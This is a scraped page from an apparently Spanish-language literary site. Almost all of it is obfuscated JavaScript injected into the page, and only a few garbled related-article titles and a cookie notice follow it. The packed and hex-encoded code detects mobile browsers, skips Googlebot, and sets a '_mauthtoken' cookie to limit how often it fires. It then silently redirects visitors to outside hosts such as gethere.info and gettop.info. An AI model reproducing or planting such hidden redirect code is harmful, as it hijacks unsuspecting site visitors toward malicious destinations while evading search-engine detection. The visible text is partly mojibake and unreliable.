)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var d=document;var s=d.createElement(‘script’); eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Relacionados

Las hurAi??es, las armas y el mA?s allA? (I)

Manuel Feria García

CaAi??n y Abel: la otra historia

yassine

Muétrstrame tus papeles

Nur As-Sufiya
Cargando....

Esta web usa cookies para mejorar tu experiencia de navegación. Asumimos que está de acuerdo con esto, pero puede optar salir si lo desea. Aceptar Leer más